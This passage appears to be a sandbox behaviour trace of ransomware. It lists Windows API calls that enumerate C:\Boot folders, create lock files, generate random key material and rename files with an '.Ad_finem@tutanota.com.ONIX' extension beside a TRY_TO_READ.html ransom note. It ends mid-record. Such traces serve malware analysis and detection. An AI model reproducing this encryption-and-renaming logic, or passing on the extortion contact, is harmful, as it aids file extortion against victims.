ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.400] CloseHandle (hObject=0x3cc) returned 1 [0065.400] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.400] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x31)) [0065.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.401] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.401] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\el-GR9c354ca09c354b444c.lock") returned 37 [0065.401] CreateFileW (lpFileName="C:\\\\Boot\\el-GR9c354ca09c354b444c.lock" (normalized: "c:\\boot\\el-gr9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.401] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.401] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cba8 | out: hHeap=0x410000) returned 1 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbd0 | out: hHeap=0x410000) returned 1 [0065.402] FindFirstFileW (in: lpFileName="C:\\\\Boot\\el-GR\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447e28 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.402] GetLastError () returned 0x0 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cba8 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447e68 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447e68 | out: hHeap=0x410000) returned 1 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cba8 | out: hHeap=0x410000) returned 1 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.402] FindNextFileW (in: hFindFile=0x447e28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x309226b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.402] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.402] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.402] GetLastError () returned 0x0 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cba8 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447e68 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447e68 | out: hHeap=0x410000) returned 1 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cba8 | out: hHeap=0x410000) returned 1 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.403] FindNextFileW (in: hFindFile=0x447e28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.403] GetLastError () returned 0x0 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cba8 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.403] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cba8 | out: hHeap=0x410000) returned 1 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x489ff0 [0065.403] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665e8 [0065.403] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.403] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.403] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.404] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.404] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x489ff0 | out: pbBuffer=0x489ff0) returned 1 [0065.404] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665e8 | out: pbBuffer=0x4665e8) returned 1 [0065.404] SetFileAttributesW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.404] lstrlenW (lpString="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0065.404] GetProcessHeap () returned 0x410000 [0065.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.404] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" [0065.404] lstrcatW (in: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.404] GetProcessHeap () returned 0x410000 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.404] CloseHandle (hObject=0xffffffff) returned 0 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.404] FindNextFileW (in: hFindFile=0x447e28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.404] GetLastError () returned 0x6 [0065.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c60 [0065.404] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c60 | out: hHeap=0x410000) returned 1 [0065.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bf0 | out: hHeap=0x410000) returned 1 [0065.404] FindNextFileW (in: hFindFile=0x447e28, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x309226b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x309226b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.404] CloseHandle (hObject=0x3cc) returned 1 [0065.405] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.405] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x5, wMilliseconds=0x31)) [0065.405] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.405] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.405] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.405] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Boot\\en-US9c354ca09c354b444c.lock") returned 37 [0065.405] CreateFileW (lpFileName="C:\\\\Boot\\en-US9c354ca09c354b444c.lock" (normalized: "c:\\boot\\en-us9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.406] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.406] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470bf0 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cc20 | out: hHeap=0x410000) returned 1 [0065.406] FindFirstFileW (in: lpFileName="C:\\\\Boot\\en-US\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447e68 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.406] GetLastError () returned 0x0 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ea8 [0065.406] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ea8 | out: hHeap=0x410000) returned 1 [0065.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.407] FindNextFileW (in: hFindFile=0x447e68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.407] GetLastError () returned 0x0 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ea8 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ea8 | out: hHeap=0x410000) returned 1 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.407] FindNextFileW (in: hFindFile=0x447e68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.407] GetLastError () returned 0x0 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.407] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48b100 [0065.407] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665f8 [0065.407] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.408] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.408] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.408] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.408] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48b100 | out: pbBuffer=0x48b100) returned 1 [0065.408] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4665f8 | out: pbBuffer=0x4665f8) returned 1 [0065.408] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0065.408] lstrlenW (lpString="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned 30 [0065.408] GetProcessHeap () returned 0x410000 [0065.408] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.408] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\en-US\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui" [0065.408] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\en-US\\bootmgr.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.408] GetProcessHeap () returned 0x410000 [0065.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.408] CloseHandle (hObject=0xffffffff) returned 0 [0065.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.408] FindNextFileW (in: hFindFile=0x447e68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0065.408] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.408] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.408] GetLastError () returned 0x6 [0065.408] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cbf8 [0065.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470c28 [0065.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.409] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.409] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470c28 | out: hHeap=0x410000) returned 1 [0065.409] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cbf8 | out: hHeap=0x410000) returned 1 [0065.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4541a8 [0065.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48b208 [0065.409] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x466608 [0065.409] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.409] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.409] CreateFileW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0xffffffff [0065.409] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.409] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48b208 | out: pbBuffer=0x48b208) returned 1 [0065.409] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x466608 | out: pbBuffer=0x466608) returned 1 [0065.409] SetFileAttributesW (lpFileName="C:\\\\Boot\\en-US\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0065.409] lstrlenW (lpString="C:\\\\Boot\\en-US\\memtest.exe.mui") returned 30 [0065.410] GetProcessHeap () returned 0x410000 [0065.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xac) returned 0x473108 [0065.410] lstrcpyW (in: lpString1=0x473108, lpString2="C:\\\\Boot\\en-US\\memtest.exe.mui" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui") returned="C:\\\\Boot\\en-US\\memtest.exe.mui" [0065.410] lstrcatW (in: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Boot\\en-US\\memtest.exe.mui.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0065.410] GetProcessHeap () returned 0x410000 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473108 | out: hHeap=0x410000) returned 1 [0065.410] CloseHandle (hObject=0xffffffff) returned 0 [0065.410] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.410] FindNextFileW (in: hFindFile=0x447e68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30948810, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30948810, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30948810, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, 